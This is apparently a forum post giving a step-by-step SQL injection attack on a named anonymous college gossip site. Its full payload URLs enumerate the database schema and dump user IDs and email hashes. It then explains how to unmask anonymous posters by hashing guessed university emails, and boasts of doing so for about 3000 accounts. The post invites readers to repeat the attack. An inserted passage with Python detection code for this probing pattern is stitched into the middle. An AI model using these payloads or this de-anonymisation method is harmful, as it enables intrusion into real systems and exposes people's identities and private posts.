
The whole site is vulnerable to something called SQL-Injection.

The following link shows all of the vulnerable fields on a given webpage (using a random thread; you could use any one you wanted, though):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we want pulled from the SQL database (the thing that holds user IDs and emails).

I'm going to skip a few parts here and get to the nitty-gritty of the matter. The overall database is called "acb" and it has the following tables:
tbl_attempts, tbl_crush, tbl_emails, tbl_free_posts, tbl_message_headers, tbl_messages, tbl_moderators, tbl_newpasses, tbl_original_posts, tbl_recentmail, tbl_replies, tbl_reports, tbl_schools, tbl_topics, tbl_users, tbl_views, tbl_votes

tbl_crush looks potentially embarrassing, as does tbl_messages, but right now we're after tbl_emails, tbl_replies, tbl_topics and tbl_users.

The thing is, when we specify what table we want to check out, instead of writing "tbl_users", we have to write it in hex. So we get the following URL (change the hex code for tbl_users to the hex code for any other table you want):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626C5F7573657273--

This table has the following fields:

id,email,password,num_bans,ban,school_tag,time,fb_id,activation

What does this mean? It means that every email has a specific ID number attached to it (as well as the number of bans said person has received). Let's pull out ID and email, using the following (it should be obvious how it was done, if you're playing along at home):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users--

Now, let's look at the output:

We've obviously reached some kind of character limit, so (unfortunately) we have to run the code multiple times, using something like this to start our count at the truncated user (user 30 was cut off, in this case):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users+where+id%3E29--
See, we're asking to get data from tbl_users where id>29. Just run this over and over and you'll get all the data you need (in about 30 minutes I pulled about 3000 accounts; can share if needed).

But look, the email is encrypted. Any good cryptologist can see that this is just the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the designers of the site did something wonderful for us: "tbl_emails" lists two fields, "email" and "school". If we run the following, we see users' emails and the school they are associated with:
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_emails--
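As an added example (not code from the original post), here is detection logic a defender could run over web-server access logs to catch the UNION/information_schema probing pattern shown in the URLs above. The log lines, addresses and timestamps are constructed samples; only the request paths mirror the shape of the quoted URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the post); the paths mirror
# the shape of the URLs quoted above so the indicators have something to fire on.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "GET /sb.php?school=jhu&page=thread&id=91305 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2012:10:00:02 +0000] "GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 5200
10.0.0.7 - - [01/Jan/2012:10:00:09 +0000] "GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626C5F7573657273-- HTTP/1.1" 200 5300
10.0.0.9 - - [01/Jan/2012:10:00:12 +0000] "GET /sb.php?school=jhu&page=thread&id=91306 HTTP/1.1" 200 5100
"""

# Common log format: client IP, timestamp, request line.
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Signs of the UNION-based probing the post walks through, checked on the decoded value.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("comment_tail", re.compile(r"(--|#)\s*$")),
]

def decode_params(path):
    """Return {param: decoded value}; parse_qs turns '+' into spaces and decodes %xx."""
    query = urlsplit(path).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def scan_line(line, numeric_params=("id",)):
    """Parse one log line and return its indicator hits (None if the line does not parse)."""
    m = REQ_RE.match(line)
    if not m:
        return None
    hits = []
    for name, value in decode_params(m.group("path")).items():
        # A thread id should be a plain integer; anything else is a type violation.
        if name in numeric_params and not value.strip().isdigit():
            hits.append(f"{name}:non_numeric")
        for label, rx in INDICATORS:
            if rx.search(value):
                hits.append(f"{name}:{label}")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "hits": hits}

def scan_log(text):
    """Return only the records that triggered at least one indicator."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r and r["hits"]]

if __name__ == "__main__":
    for rec in scan_log(SAMPLE_LOG):
        print(rec["ts"], rec["ip"], ", ".join(rec["hits"]))
```

The numeric-type check alone catches every probe in the sample, which is the same observation a parameterized query would have enforced server-side.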

Now we can limit the search to only include school "jhu", and once we have all these emails, we can simply run them through MySQL's PASSWORD() command and match the encrypted return up with one we pulled from the database, then modify our search parameters to exclude those emails and continue on ad nauseam.

That's not really what most of us want. We want to see who could probably be posting about us, or somebody we know. So instead, it's much easier to encrypt-then-match people's JHED emails that you know. Let's say I think Frat Brother #4 posted something bad about my buddy; luckily I know his name and can guess his JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run PASSWORD(adouche1@jhu.edu), get an encrypted string, and match it up to the data I pulled so I can see what user ID is attached to it. If there's no hit, I try PASSWORD(adouche2@jhu.edu), increasing the number up to some reasonable value before giving up.

Once we have an email account's ID number, it's all a matter of going through tbl_replies or tbl_topics and sorting by user ID to see what this one person has posted. There are many more refined methods of doing this, but this is probably the one people will want to know how to do. It's also possible to just select one field (I like field 5) in a given thread and have it display that person's ID number, or anything else if you're so inclined. Play around, get a feel for the database architecture, and you can do some cool stuff.

Oh, and a note to people using emails different than their JHED-given ones: the school's database should allow you to tease out what emails are registered to what JHED ID (looking at you, pedobear@jhu.edu). I'm trying to find a way to link them; it shouldn't be that hard.

Who would go through all of this trouble? Well, it's not that much of a hassle if you can write up some scripts to do it for you. Which I did: a little Perl script that goes through the school's directory (I pulled an offline copy), gets each person's name and makes a presumed JHED email for them based on their first initial, up to 6 letters of their last name, and gives them a number based on frequency. It also generates a first-initial-last-name@jhu.edu address to test too. Then it batch-encrypted them and matched them to ID numbers, and now I've got over 3000 accounts open for business.

I won't be sharing these. Suffice to say, somebody knows everything you've posted now. You guys should be nicer to each other.

Total time for the home hacker: 3 hours, give or take. It's a good way to learn
how to NOT set up a secure database, too.

Total time for YOLO: an hour, if you can stick with it. Then you'll know everything your best friend has been saying about you :) [seriously, watching this is like watching a soap opera, it's awesome]

Have fun! Post results!
